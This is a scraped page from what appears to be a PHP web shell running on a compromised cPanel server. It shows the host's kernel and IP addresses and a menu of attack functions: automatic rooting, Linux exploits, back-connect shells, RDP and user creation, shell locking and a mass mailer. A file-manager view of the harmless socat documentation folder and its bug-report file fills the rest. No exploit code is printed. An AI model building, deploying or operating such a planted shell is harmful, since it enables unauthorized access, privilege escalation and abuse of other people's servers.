Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.241.157
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
socat /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
BUGREPORTS
746
B
-rw-r--r--
DEVELOPMENT.gz
3.21
KB
-rw-r--r--
EXAMPLES.gz
6.2
KB
-rw-r--r--
FAQ
3.75
KB
-rw-r--r--
NEWS.Debian.gz
207
B
-rw-r--r--
PORTING
3.02
KB
-rw-r--r--
README.Debian
280
B
-rw-r--r--
README.FIPS
2.59
KB
-rw-r--r--
README.gz
5.08
KB
-rw-r--r--
SECURITY
1.81
KB
-rw-r--r--
changelog.Debian.gz
1007
B
-rw-r--r--
copyright
2.69
KB
-rw-r--r--
dest-unreach.css
298
B
-rw-r--r--
index.html
538
B
-rw-r--r--
socat-genericsocket.html
15.16
KB
-rw-r--r--
socat-multicast.html
14.59
KB
-rw-r--r--
socat-openssltunnel.html
8.31
KB
-rw-r--r--
socat-tun.html
6.54
KB
-rw-r--r--
socat.html
234.81
KB
-rw-r--r--
xio.help.gz
28.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BUGREPORTS
* If you have found a bug, i.e. socat SIGSEGV'ed, terminated abnormally without error message, did not comply to the documentation, or behaves different from your expectations, please send the following infos to socat@dest-unreach.org, as available: . output of "make info" in socat.out (you may remove the hostname in the first line to keep your privacy) . config.log . run your example with "socat -d -d -d -d -D ..." options, and include the log output . describe what you've done, and why you think socat did wrong * If you fixed a bug: Please do as described in the above paragraph, and include the modified files (or a patch file) * If you have contributions, problems etc: send available info and a description to the above address.
Close